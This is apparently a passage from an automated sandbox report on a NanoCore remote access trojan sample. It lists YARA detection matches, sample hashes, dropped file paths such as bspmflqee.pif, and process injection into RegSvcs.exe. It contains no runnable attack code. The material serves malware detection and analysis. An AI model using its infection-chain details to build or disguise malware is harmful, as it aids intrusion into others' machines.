        Source: 0000000C.00000003.423356287.0000000004A16000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.423356287.0000000004A16000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.386935348.00000000042C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.386935348.00000000042C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000003.421567836.00000000049E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000003.421567836.00000000049E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000003.516555865.0000000004241000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.516555865.0000000004241000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.386760974.000000000435E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.386760974.000000000435E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000018.00000002.492519775.0000000001302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000018.00000002.492519775.0000000001302000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001D.00000003.513089293.0000000004241000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.513089293.0000000004241000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.384853009.00000000042F6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.384853009.00000000042F6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000005.00000002.575657153.0000000006FB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000005.00000002.575569142.0000000006F90000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.512868270.0000000004276000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001D.00000003.512868270.0000000004276000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000018.00000002.493877285.0000000004719000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000003.468116768.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000003.468116768.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: bspmflqee.pif PID: 3836, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: bspmflqee.pif PID: 3836, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegSvcs.exe PID: 4644, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegSvcs.exe PID: 4644, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: bspmflqee.pif PID: 1048, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: bspmflqee.pif PID: 1048, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegSvcs.exe PID: 3560, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegSvcs.exe PID: 3560, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: bspmflqee.pif PID: 3032, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: bspmflqee.pif PID: 3032, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: bspmflqee.pif PID: 4732, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: bspmflqee.pif PID: 4732, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8626D1_2_00D8626D
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D783C01_2_00D783C0
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D730FC1_2_00D730FC
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D9C0B01_2_00D9C0B0
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D901131_2_00D90113
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D833D31_2_00D833D3
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8F3CA1_2_00D8F3CA
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D7F5C51_2_00D7F5C5
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D9C55E1_2_00D9C55E
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D905481_2_00D90548
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D7E5101_2_00D7E510
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D726921_2_00D72692
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D866A21_2_00D866A2
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00DA06541_2_00DA0654
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8364E1_2_00D8364E
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8F8C61_2_00D8F8C6
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8589E1_2_00D8589E
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D7E9731_2_00D7E973
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8397F1_2_00D8397F
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D7BAD11_2_00D7BAD1
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D7DADD1_2_00D7DADD
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D86CDB1_2_00D86CDB
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8FCDE1_2_00D8FCDE
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D93CBA1_2_00D93CBA
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D75D7E1_2_00D75D7E
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D93EE91_2_00D93EE9
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D73EAD1_2_00D73EAD
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D7DF121_2_00D7DF12
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00F998F04_2_00F998F0
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00F935F04_2_00F935F0
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00FB088F4_2_00FB088F
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00FAA1374_2_00FAA137
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00FA19034_2_00FA1903
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00F9F7304_2_00F9F730
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00FB1F2C4_2_00FB1F2C
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00FA37214_2_00FA3721
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 5_2_01F9E4805_2_01F9E480
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 5_2_01F9E4715_2_01F9E471
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 5_2_01F9BBD45_2_01F9BBD4
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 19_2_0514E47119_2_0514E471
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 19_2_0514E48019_2_0514E480
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 19_2_0514BBD419_2_0514BBD4
        Source: bspmflqee.pif.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeSection loaded: dxgidebug.dllJump to behavior
        Source: ameHrrFwNp.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: 32.2.RegSvcs.exe.3a2e6b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 32.2.RegSvcs.exe.3a2e6b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 5.2.RegSvcs.exe.48bb041.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.RegSvcs.exe.48bb041.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.4313078.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 29.3.bspmflqee.pif.4313078.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.4313078.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 29.3.bspmflqee.pif.42a9c50.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 29.3.bspmflqee.pif.42a9c50.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.42a9c50.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 24.2.RegSvcs.exe.47607ce.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.RegSvcs.exe.47607ce.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3e23078.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.3.bspmflqee.pif.3e23078.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3e23078.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 5.2.RegSvcs.exe.6f90000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.RegSvcs.exe.6f90000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 19.2.RegSvcs.exe.3be07ce.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.RegSvcs.exe.3be07ce.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.4313078.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 29.3.bspmflqee.pif.4313078.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.4313078.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 32.2.RegSvcs.exe.4a1b041.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 32.2.RegSvcs.exe.4a1b041.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 5.2.RegSvcs.exe.48b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.RegSvcs.exe.48b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 5.2.RegSvcs.exe.48b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 5.2.RegSvcs.exe.388df38.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.RegSvcs.exe.388df38.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4a49c50.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4a49c50.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4a49c50.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 32.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 32.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 32.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.3.bspmflqee.pif.4b1c088.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4b1c088.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4b1c088.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.RegSvcs.exe.3beb041.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.RegSvcs.exe.3beb041.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4ab3078.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4ab3078.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4ab3078.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 24.2.RegSvcs.exe.476b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.RegSvcs.exe.476b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 19.2.RegSvcs.exe.3be560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.RegSvcs.exe.3be560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
